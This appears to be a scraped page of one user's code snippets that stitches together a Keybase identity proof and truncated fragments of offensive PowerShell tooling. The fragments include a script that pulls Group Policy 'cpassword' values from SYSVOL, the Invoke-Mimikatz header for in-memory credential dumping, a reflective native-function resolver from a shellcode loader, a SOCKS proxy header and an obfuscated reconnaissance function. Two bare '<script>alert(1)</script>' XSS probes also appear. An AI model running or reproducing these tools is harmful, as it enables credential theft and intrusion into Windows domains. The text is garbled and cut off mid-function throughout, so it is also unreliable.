I hereby claim:
- I am alacerda on github.
- I am alacerda (https://keybase.io/alacerda) on keybase.
- I have a public key ASDSq78cByBwvFr_Ezr7FuLAWLXQYcTrYMPc2AhX1fcFPwo
To claim this, I am signing this object:
<script>alert(1)</script> |
function 026904T3 { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Position = 0)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ModuleName = [Guid]::NewGuid().ToString() |
$pwdfoundgpo = New-Object 'System.Collections.Generic.List[System.Object]' | |
$DomainName = "" | |
$Items = Get-ChildItem "\\$DomainName\SYSVOL\*\Policies" -recurse -Filter *.xml | |
foreach ($XMLFileName in $Items){ | |
[string]$XMLContent = Get-content ($XMLFileName.FullName) | |
if($XMLContent.Contains("cpassword")){ | |
[string]$Cpassword = [regex]::matches($XMLContent,'(cpassword=).+?(?=\")') |
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 |
I hereby claim:
To claim this, I am signing this object:
<# | |
.SYNOPSIS | |
Powershell Socks Proxy | |
Author: p3nt4 (https://twitter.com/xP3nt4) | |
License: MIT | |
.DESCRIPTION | |
Set-StrictMode -Version 2 | |
# func_get_proc_address: resolves the address of an exported native function
# using only reflection over types already loaded in the process.
#   $var_module    - module name passed to GetModuleHandle
#   $var_procedure - export name passed to GetProcAddress
# Returns whatever GetProcAddress returns (presumably an IntPtr; confirm against callers).
# NOTE(review): the trailing '| |' on each line looks like listing-table residue
# from the page, not PowerShell syntax.
# Defender note: no Add-Type or [DllImport] declaration appears here; the native
# lookup goes through the internal Microsoft.Win32.UnsafeNativeMethods type.
# References to that type name together with GetProcAddress/GetModuleHandle in
# script block logs (Event ID 4104) or AMSI content are worth alerting on.
function func_get_proc_address { | |
Param ($var_module, $var_procedure) | |
# Pick the GAC-loaded System.dll out of the current AppDomain's assemblies and
# fetch its non-public UnsafeNativeMethods type.
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') | |
# Select the GetProcAddress overload that takes (HandleRef, string).
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) | |
# Call GetModuleHandle($var_module), wrap the handle in a HandleRef (with a fresh
# IntPtr as the wrapper object), then invoke GetProcAddress for $var_procedure.
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) | |
} | |
function func_get_delegate_type { |
function Invoke-Mimikatz | |
{ | |
<# | |
.SYNOPSIS | |
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as | |
dump credentials without ever writing the mimikatz binary to disk. | |
The script has a ComputerName parameter which allows it to be executed against multiple computers. | |
This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed. |
<script>alert(1)</script> |
function embroil { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Position = 0)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ModuleName = [Guid]::NewGuid().ToString() | |
) | |
$PhtttnVb99 = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @()) |